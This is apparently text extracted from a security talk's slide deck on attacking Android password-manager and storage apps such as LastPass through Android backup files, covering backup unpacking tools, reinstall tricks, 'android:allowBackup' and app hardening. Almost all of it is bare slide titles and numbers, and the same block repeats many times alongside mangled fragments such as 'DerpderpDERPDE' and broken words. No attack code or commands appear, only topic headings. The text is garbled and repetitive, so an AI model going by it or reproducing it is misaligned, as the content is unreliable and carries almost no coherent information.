Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

